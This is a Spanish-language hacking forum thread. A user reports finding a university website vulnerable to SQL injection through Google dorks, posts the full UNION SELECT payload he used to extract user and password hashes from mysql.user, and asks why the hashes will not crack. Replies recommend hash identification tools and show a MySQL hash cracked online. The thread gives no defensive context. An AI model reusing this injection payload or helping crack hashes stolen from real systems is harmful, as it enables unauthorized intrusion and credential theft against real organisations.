Imprimir Página - ¿Porque no se descifra este hash?

Título: ¿Porque no se descifra este hash?
Publicado por: TheFerret en 1 Septiembre 2015, 12:41 PM

Haciendo Google Dorks me encontré esta web de una Universidad vulnerable a SQL INJECTION.
He intentado descifrar los hashes que aparecen pero no lo consigo! No es MD5 o SHA1?

http://www.xxx./xxx/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2+FROM+mysql.user--

Mod: No poner enlaces a paginas vulnerables directamente.

Título: Re: ¿Porque no se descifra este hash?
Publicado por: el-brujo en 1 Septiembre 2015, 17:07 PM

puede ser un hash cifrado, pero seguramente es un hash cifrado con un salt.

Mira con:

Si desconoces el tipo de Hash que posees, tienes la opción de poder utilizar un Script que te permite resolver el problema. La herramienta (script) escrita en Python es Hash ID ( Hash Identifier)

https://code.google.com/p/hash-identifier/

Versión actualizada de Hash ID:

https://github.com/psypanda/hashID

Título: Re: ¿Porque no se descifra este hash?
Publicado por: Shell Root en 9 Noviembre 2015, 21:18 PM

Se supone que el hash que estas sacando es el de MySQL, por ej:

Este hash estoy seguro de que es de MySQL, el hash es el siguiente:

Código [Seleccionar]

*90E462C37378CED12064BB3388827D2BA3A9B689

Cuando trato de crackearlo con las paginas online, me sale lo siguiente:

Código [Seleccionar]

90e462c37378ced12064bb3388827d2ba3a9b689 MySQL4.1/MySQL5 : biscuit

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: TheFerret en 1 Septiembre 2015, 12:41 PM